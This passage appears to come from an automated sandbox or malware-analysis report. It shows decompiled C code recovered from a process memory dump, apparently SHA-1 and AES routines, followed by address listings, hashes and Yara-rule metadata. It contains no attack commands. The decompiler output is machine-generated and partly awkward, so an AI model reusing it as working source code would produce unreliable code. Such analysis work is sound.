				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				char* _t536;
				char* _t544;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					do {
						_t536 =  &_v5;
						_t544 = _t536;
						asm("cld");
						_t358 = _v12;
						_v12 = _t532;
					} while (_t544 != 0);
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}

0x72488c8b
0x72488c8f
0x72488c91
0x72488c91
0x72488c94
0x72488cb6
0x72488cdc
0x72488d02
0x72488d24
0x72488d2b
0x72488d2e
0x72488d31
0x72488d3a
0x72488d40
0x72488d47
0x72488d58
0x72488d5b
0x72488d5e
0x72488d62
0x72488d64
0x72488d66
0x72488d6f
0x72488d72
0x72488d75
0x72488d80
0x72488d86
0x72488d88
0x72488d88
0x72488d8b
0x72488d8e
0x72488d8e
0x72488d93
0x72488d95
0x72488d98
0x72488d9b
0x72488da1
0x72488da4
0x72488da7
0x72488db0
0x72488db6
0x72488dbf
0x72488dce
0x72488dd5
0x72488dd8
0x72488ddb
0x72488de4
0x72488de7
0x72488dea
0x72488e02
0x72488e09
0x72488e0b
0x72488e0e
0x72488e11
0x72488e1a
0x72488e21
0x72488e24
0x72488e27
0x72488e36
0x72488e3d
0x72488e40
0x72488e43
0x72488e4c
0x72488e56
0x72488e59
0x72488e65
0x72488e68
0x72488e6f
0x72488e72
0x72488e75
0x72488e7a
0x72488e7d
0x72488e86
0x72488e97
0x72488e9a
0x72488e9d
0x72488ea4
0x72488ea7
0x72488eaa
0x72488ead
0x72488eaf
0x72488eb2
0x72488eb5
0x72488ebe
0x72488ec3
0x72488ec3
0x72488ed8
0x72488edb
0x72488ede
0x72488ee5
0x72488ee8
0x72488eeb
0x72488f00
0x72488f07
0x72488f0a
0x72488f0e
0x72488f11
0x72488f16
0x72488f19
0x72488f28
0x72488f2b
0x72488f32
0x72488f35
0x72488f38
0x72488f3b
0x72488f3e
0x72488f46
0x72488f54
0x72488f57
0x72488f5a
0x72488f5a
0x72488f61
0x72488f64
0x72488f67
0x72488f6f
0x72488f7d
0x72488f80
0x72488f87
0x72488f8a
0x72488f8d
0x72488f90
0x72488f93
0x72488f9c
0x72488fa3
0x72488fa3
0x72488fa9
0x72488fc2
0x72488fc5
0x72488fcc
0x72488fcf
0x72488fd2
0x72488fe4
0x72488fee
0x72488ff1
0x72488ffa
0x72488ffd
0x72489004
0x72489007
0x7248900d
0x72489020
0x72489027
0x7248902a
0x7248902d
0x72489030
0x72489039
0x7248903c
0x7248904f
0x72489052
0x7248905c
0x7248905f
0x72489061
0x7248906a
0x7248906d
0x72489080
0x72489086
0x72489089
0x72489090
0x72489092
0x72489095
0x72489098
0x7248909b
0x7248909e
0x724890a1
0x724890aa
0x724890af
0x724890b2
0x724890b2
0x724890c5
0x724890c8
0x724890cb
0x724890d2
0x724890d5
0x724890d8
0x724890db
0x724890ee
0x724890f1
0x724890fc
0x724890ff
0x7248910b
0x7248910e
0x72489114
0x72489117
0x7248911a
0x72489121
0x72489131
0x72489134
0x7248913a
0x7248913d
0x72489144
0x72489146
0x72489149
0x7248914c
0x7248914d
0x7248914d
0x7248914d
0x7248914e
0x7248914f
0x72489152
0x72489153
0x72489159
0x72489168
0x7248916b
0x72489172
0x72489175
0x72489178
0x7248917b
0x7248917e
0x72489181
0x72489184
0x7248918d
0x7248919e
0x724891a6
0x724891ac
0x724891af
0x724891b1
0x724891b4
0x724891b7
0x724891c4

Strings

(, xrefs: 72488F9C

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: e45bde07df2f29c9c6167222d4a7b9819c0d72dab568059c5b9042f1363b28d4
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: 68022DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 025CDF7C, Relevance: 1.6, Strings: 1, Instructions: 372COMMON

Download Yara Rule

Strings

@, xrefs: 025FB333

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: e85e90dd0b9719a55dab1c0663965b7d6b93435695341bc7a92dc58d0e854178
Instruction ID: f36fc4e06454e1d05414a64ae4fc517488056c5c2694bce71f5d8f9965ad063f
Opcode Fuzzy Hash: e85e90dd0b9719a55dab1c0663965b7d6b93435695341bc7a92dc58d0e854178
Instruction Fuzzy Hash: 3ED13771D0521ADFDF28CFD9C5866BDBBB1FB45318F64842ED812B6640E7349A42CB88

Uniqueness

Uniqueness Score: -1.00%

Function 025D57C3, Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

, xrefs: 025FFF78

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: a86a471240d63b756315390846a9825581feb64457ed57bd18ae8d5564023616
Instruction ID: aa18094e7312bccfc3bd00b9f8c8421061aea87536dfe76891c9de7903e7a340
Opcode Fuzzy Hash: a86a471240d63b756315390846a9825581feb64457ed57bd18ae8d5564023616
Instruction Fuzzy Hash: 8FA12371A442497AEF38CE68CC40BFE3BA5BF49318F4404A9F946DA1D1DB74C990CB29

Uniqueness

Uniqueness Score: -1.00%

Function 025B0F3F, Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

, xrefs: 025B0FC1

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: a8012d96f25005f0b74bb2d48f07e53518960ef7b0e66479764d01430dc5a56e
Instruction ID: bbaa47c08b7e97f0c320745782b6829df46fbe1828fd2ff3903043fd6a16fdc6
Opcode Fuzzy Hash: a8012d96f25005f0b74bb2d48f07e53518960ef7b0e66479764d01430dc5a56e
Instruction Fuzzy Hash: 1281E673E01114DBDF69CE69C8946BD7B61FF8836CF158229DA16AB2C4D730E941CB88

Uniqueness

Uniqueness Score: -1.00%

Function 025E6540, Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf3aace0eee00dd7d8b9421bd2df7728fa7323d9af3e0e213de9131a621edcaa
Instruction ID: 8105c557ab85b7292f4c61937c43d24a40909692a6b6dd5c4a593eb44872254c
Opcode Fuzzy Hash: bf3aace0eee00dd7d8b9421bd2df7728fa7323d9af3e0e213de9131a621edcaa
Instruction Fuzzy Hash: 6C128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684

Uniqueness

Uniqueness Score: -1.00%

Function 0264CBA4, Relevance: .5, Instructions: 529COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90d3f469960bd276159c6ed70d048ce773126db8986d193b2bd552659773e7e8
Instruction ID: 9360ba750659f9794645f78d6b074d2f6fe9daff5d14b234b8488c9a1ebc7b5a
Opcode Fuzzy Hash: 90d3f469960bd276159c6ed70d048ce773126db8986d193b2bd552659773e7e8
Instruction Fuzzy Hash: D6228771D00218DFDB24CF98C884AEDBBF1FF49314F15816AE888AB391D775A985CB54

Uniqueness

Uniqueness Score: -1.00%

Function 025A2305, Relevance: .5, Instructions: 528COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e09b156b8a501b194594bfd83367e5389dd85d5eadd884405b686d64928b303d
Instruction ID: 1aaf78a83b5b5f3558b0eb0c931a0e9edebb095e9ca66476a9b506fa70072e4e
Opcode Fuzzy Hash: e09b156b8a501b194594bfd83367e5389dd85d5eadd884405b686d64928b303d
Instruction Fuzzy Hash: D302A433D69BB34B4B714EB940F262E7EA06E0259470F87E9DCC07F686C212DD0996E4

Uniqueness

Uniqueness Score: -1.00%

Function 0262DBDA, Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51c668c516df592cf3ab0b3750151479ebae755d4a30b30d08630dbe41507220
Instruction ID: 38fe71afd0d09f532a6aaf4464419c63cb474d69d5feeba415f4fc80e3baf3c8
Opcode Fuzzy Hash: 51c668c516df592cf3ab0b3750151479ebae755d4a30b30d08630dbe41507220
Instruction Fuzzy Hash: 7C129F70204AB1DADB68CF29C4947B5B7E0EF05304F0488A9E8D68B796D335E45ACFA4

Uniqueness

Uniqueness Score: -1.00%

Function 025C286D, Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ddfa4334b32a9b1189f38281be8a174f78f46c8b32aed053401b6e198ead280
Instruction ID: c6b010a590d48f6927af8497827693fedfdf73892ae34936c0d58222db2e699a
Opcode Fuzzy Hash: 0ddfa4334b32a9b1189f38281be8a174f78f46c8b32aed053401b6e198ead280
Instruction Fuzzy Hash: C502AE7091012A9ECF389F58C8887B9BBB1FF04314F6440EAE949E6190E7748ED1CF99

Uniqueness

Uniqueness Score: -1.00%

Function 72482FB0, Relevance: .4, Instructions: 435
COMMONCrypto

Download Yara Rule

C-Code - Quality: 26%

			E72482FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
